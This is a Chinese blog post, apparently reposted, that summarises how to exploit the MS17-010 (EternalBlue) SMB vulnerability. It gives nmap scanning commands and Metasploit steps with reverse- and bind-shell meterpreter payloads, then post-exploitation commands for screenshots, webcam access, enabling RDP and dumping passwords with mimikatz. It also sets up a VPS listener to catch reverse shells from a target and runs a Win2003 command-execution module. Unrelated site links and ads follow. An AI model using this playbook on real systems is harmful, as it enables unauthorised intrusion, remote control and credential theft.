MS17010漏洞利用总结

MS17010漏洞利用总结0x01常规打法扫描是否存在ms17-010漏洞:nmap-n-p445–scriptsmb-vuln-ms17-010192.168.1.0/24–openMSF常规漏洞利用:msf>useexploit/windows/smb/ms17_010_eternalbluemsf>setrhost192.168.1.112反向打:msf>setpayloadwindows/x64/meterpreter/reverse_tcpm

大家好,又见面了,我是你们的朋友全栈君。

0x01 常规打法

扫描是否存在ms17-010漏洞

nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open

MSF常规漏洞利用:

msf > use exploit/windows/smb/ms17_010_eternalblue 
msf > set rhost 192.168.1.112 
反向打:
msf > set payload windows/x64/meterpreter/reverse_tcp 
msf > set lhost 192.168.1.118
正向打:
msf > set payload windows/x64/meterpreter/bind_tcp

常用功能:

桌面抓图 
meterpreter > screenshot
视频开启 
meterpreter > webcam_scream
开启远程桌面 
meterpreter > run post/windows/manage/enable_rdp 
目标密码破解
第一步:载入mimikatz
meterpreter > load mimikatz
第二步:使用命令wdigest获取密码
meterpreter >wdigest

0x02 反弹到VPS稳定打法

(常规打不好使的情况下。)

1.环境
vps 140.x.x.x
目标 192.168.3.123
本地kali 192.168.3.62

2.vps开启监听。

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 443
exploit -j -z 

在这里插入图片描述
3.kali下开始攻击。

use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.3.123
set payload windows/x64/meterpreter/reverse_tcp
set lhost 140.x.x.x  #反弹到vps
set lport 443

在这里插入图片描述
run到下图界面Ctrl+C
在这里插入图片描述
4.vps收到meterpreter。(如果不稳定就多打几次)
在这里插入图片描述

0x03 目标为Win2003情况下稳定打

方法一(命令执行)

msf5 > use auxiliary/admin/smb/ms17_010_command
msf5 > set command whoami
msf5 > set rhosts x.x.x.x

在这里插入图片描述
方法二(返回meterpreter)
在这里插入图片描述

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/131363.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • T-SQL之DECLARE,SET,PRINT语句[通俗易懂]

    T-SQL之DECLARE,SET,PRINT语句[通俗易懂]1.DECLARE语句DECLARE语句是数据声明语句,主要作用是声明局部变量、函数、存储过程或游标变量等;基本语法格式:DECLARE{{@local_variable[AS]data_type}|[=value]}[,…n]@local_variable即变量的名称,一定要以@开头,data_type为变量的数据类型,value是声明的变量的值(可选)…

  • CountDownLatch踩过的坑[通俗易懂]

    CountDownLatch踩过的坑[通俗易懂]线上生产环境dubbo报线程池满了,经过一天排查锁定在开三个线程计算最后合并数据的步骤中。简单描述下该步骤线程开三个调用三个不同的方法使用countdownlatch计数器等待三个方法全部执行完成合并数据。但是由于其中一个方法调用第三方接口,接口返回异常导致转换数据报错。导致其中一个方法未正常完成。举例demo:publicstaticvoidmain(String[]a…

  • 关于Jlink调试器JTAG和SWD的接口定义

    关于Jlink调试器JTAG和SWD的接口定义原贴:https://www.cnblogs.com/kwseeker-bolgs/p/3925473.html1、TestClockInput(TCK)—–强制要求1TCK在IEEE1149.1标准里是强制要求的。TCK为TAP的操作提供了一个独立的、基本的时钟信号,TAP的所有操作都是通过这个时钟信号来驱动的。2、TestModeSelectionInput(…

  • cuda卸载与安装

    cuda卸载与安装cuda卸载1.正常卸载操作在cuda的安装目录下,有卸载脚本1.运行卸载脚本cd/usr/local/cuda/binsudo./uninstall_cuda_9.0.pl2.删除安装文件夹sudorm-rfcudasudorm-rcuda-9.0找不到uninstall的卸载操作1.正常卸载操作sudoapt-get–purgeremovecuda:卸载软件及其配置sudoapt-getautoremovecuda

  • lua string find_string.find

    lua string find_string.find在lua的string.find方法用法为string.find(s1,s2)含义为查找字符串s2在s1中出现的位置,如果找不到,返回nil。但这个方法实际上是以正则表达式来解释s2的,所以string.find(‘if(i>10)’,'(‘)这个表达式运行时会出现错误unfinishedcapture。lua中的正则表达式使用的特殊字符为^$()…

    2022年10月14日

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号